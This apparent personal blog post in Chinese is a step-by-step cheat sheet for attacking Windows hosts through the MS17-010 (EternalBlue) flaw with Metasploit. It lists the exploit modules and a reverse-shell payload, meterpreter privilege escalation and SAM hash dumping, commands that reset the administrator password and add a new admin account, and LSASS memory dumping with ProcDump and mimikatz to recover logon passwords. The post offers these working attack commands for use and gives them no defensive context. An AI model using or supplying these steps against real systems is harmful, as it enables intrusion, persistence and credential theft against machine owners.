2018年11月8日星期四

针对MS17-010漏洞攻击之Metasploit

0x01 hash密码导出,并且破解方法
If LM hashes are enabled on your system (Win XP and lower), a hash dump will look like:
Administrator:500:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::

If LM hashes are disabled on your system (Win Vista, 7, 8+), a hash dump will look like:
Administrator:500:NO PASSWORD*********************:0CB6948805F797BF2A82807973B89537:::
每个字段的含义:          用户名:唯一安全ID:LM_HASH :NTLM_HASH
这串值就是LM_HASH,通过google “lm hash crack” 尝试破解
01FC5A6BE7BC6929AAD3B435B51404EE

0x02 Meterpreter 命令行工具
通过google搜索  “Metasploit工具Meterpreter的命令速查表”对反弹shell进行利用
其中比较常用的命令:
getuid                                        查看当前用户
getsystem                                  获取系统权限
shell                                           打开shell或者cmd
run hashdump                           把sam数据库dump



0x03 常用payload
 use windows/meterpreter/reverse_tcp
 use auxiliary/scanner/smb/pipe_auditor

ms17-010 payload:
       use exploit/windows/smb/ms17_010_eternalblue
       use exploit/windows/smb/ms17_010_psexec

0x04 ms17-010漏洞利用
     使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
     MSF下ms17_010_psexec模块使用技巧
     Meterpreter提权详解



0x05 windows修改用户密码技巧
因为中文的windwos系统,在Meterpreter 会显示乱码,在进行net user操作出现报错

比如 NET HELPMSG 2245  表示密码长度不够规格,不够复杂
比如 NET HELPMSG 3783  表示没有这个组或者用户
net user administrator abc123      //修改administrator的密码
net user test v5est0r /add                    //增加新用户
net localgroup administrators test /add       //并且加入管理员组
0x06 获取system权限,对管理员密码获取
利用Meterpreter upload 上传 ProcDump 对系统的LSASS进程内存文件导出,命令如下
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
导出后,利用Meterpreter download 将 lsass.dmp 文件下载到本地
最后运行mimikatz,进行破解
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Meterpreter 加载mimikatz直接进行破解

load mimikatz
help mimikatz
mimikatz_command -f privilege::debug
mimikatz_command -f privilege::security
mimikatz_command -f sekurlsa::logonPasswords















没有评论:

发表评论